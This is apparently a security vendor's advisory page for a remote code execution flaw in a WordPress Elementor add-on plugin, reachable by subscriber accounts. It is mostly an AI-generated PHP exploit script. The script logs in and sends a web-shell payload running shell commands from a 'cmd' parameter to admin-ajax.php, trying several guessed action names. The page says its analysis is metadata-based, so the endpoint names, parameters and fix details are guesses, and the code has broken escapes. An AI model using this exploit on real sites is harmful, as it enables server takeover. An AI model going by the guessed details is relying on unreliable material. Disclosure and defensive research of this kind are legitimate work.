Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-3132: Master Addons for Elementor Premium <= 2.1.3 – Authenticated (Subscriber+) Remote Code Execution via render_preview (master-addons-pro)

CVE ID CVE-2026-3132
Severity High (CVSS 8.8)
CWE 94
Vulnerable Version 2.1.3
Patched Version
Disclosed March 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3132 (metadata-based):
The vulnerability exists in the Master Addons for Elementor Premium plugin’s JLTMA_Widget_Admin::render_preview method. The CWE-94 classification indicates improper control of code generation, meaning user input directly influences code execution. The description confirms missing capability checks, allowing Subscriber-level users to access functionality intended for administrators. The render_preview method likely processes user-supplied data that gets evaluated as PHP code. WordPress AJAX handlers typically use the wp_ajax_{action} and wp_ajax_nopriv_{action} hooks. The plugin slug ‘master-addons-pro’ suggests AJAX actions may be prefixed with ‘jltma_’ or ‘master_addons’. The vulnerability requires authenticated access but grants minimal privileges. Attackers can execute arbitrary PHP code on the server, leading to complete system compromise. The fix in version 2.1.4 likely adds a capability check (current_user_can(‘manage_options’)) and validates/sanitizes input before any code evaluation. Atomic Edge research concludes this is a classic authenticated code injection vulnerability where insufficient authorization meets unsafe input handling.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3132 - Master Addons for Elementor Premium <= 2.1.3 - Authenticated (Subscriber+) Remote Code Execution via render_preview
<?php
/**
 * Proof of Concept for CVE-2026-3132
 * Assumptions based on metadata:
 * 1. AJAX endpoint: /wp-admin/admin-ajax.php
 * 2. Action parameter: 'jltma_render_preview' or similar
 * 3. Requires Subscriber authentication
 * 4. Payload delivered via POST parameter like 'data', 'code', or 'template'
 * 5. Plugin evaluates payload as PHP code
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber';
$password = 'password';

// Step 1: Authenticate to obtain WordPress cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
]);
$response = curl_exec($ch);

// Step 2: Send exploit payload to AJAX endpoint
// Multiple action names tested based on plugin naming conventions
$possible_actions = [
    'jltma_render_preview',
    'master_addons_render_preview',
    'jltma_widget_admin_render_preview',
    'render_preview'
];

$payload = '<?php echo "VULNERABLE: " . shell_exec($_GET["cmd"]); ?>';

foreach ($possible_actions as $action) {
    curl_setopt_array($ch, [
        CURLOPT_URL => $ajax_url,
        CURLOPT_POSTFIELDS => http_build_query([
            'action' => $action,
            'data' => $payload,
            'nonce' => 'bypassed'  // Nonce may be absent or bypassed
        ]),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE => 'cookies.txt'
    ]);
    
    $result = curl_exec($ch);
    
    // Check for successful code execution indicators
    if (strpos($result, 'VULNERABLE:') !== false) {
        echo "[+] Exploit successful with action: $actionn";
        echo "[+] Response: $resultn";
        break;
    }
}

curl_close($ch);
unlink('cookies.txt');
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School